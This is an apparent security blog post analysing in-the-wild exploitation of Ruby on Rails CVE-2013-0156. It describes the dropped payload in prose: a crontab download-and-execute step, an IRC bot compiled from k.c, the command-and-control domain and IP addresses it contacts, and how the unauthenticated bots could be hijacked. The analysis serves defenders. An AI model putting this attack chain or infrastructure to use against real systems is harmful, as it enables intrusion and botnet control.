RoR CVE-2013-0156 in the Wild

Ruby on Rails CVE-2013-0156 has recently been exploited in the wild. This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January. It’s pretty suprising that it’s taken this long to surface in the wild, but less suprising that people are still running vulnerable installations of Rails. It also appears to be affected some web hosts

This adds a command to crontab which downloads and executes files called cmd1, cmd2, and cmd3. At the time of this writing, these are no longer available. These domains have been previously associated with supsicious activity

Next, it downloads a C source file called k.c to /tmp, compiles it using the system’s gcc, and executes it.

Finally, it downloads and executes a pre-compiled version of k, presumably in case compilation fails.

The source of k.c is available.

This file executes with a name of ‘– bash’ which will appear in the processlist. It sets up an IRC bot, which connects to either cvv4you.ru (currently 188.190.124.81) or the bare IP 188.190.124.120 and joins the channel #rails. While the code supports it, no channel key is used. THe script uses a randomly generated 9 character nickname when connecting to IRC.

A lockfile ‘/tmp/tan.pid’ ensures the bot only executes once on an infected host.

Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers. There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.

In short, this is a pretty straightforward skiddy exploit of a vulnerability that has been publicly known, and warned about, for months.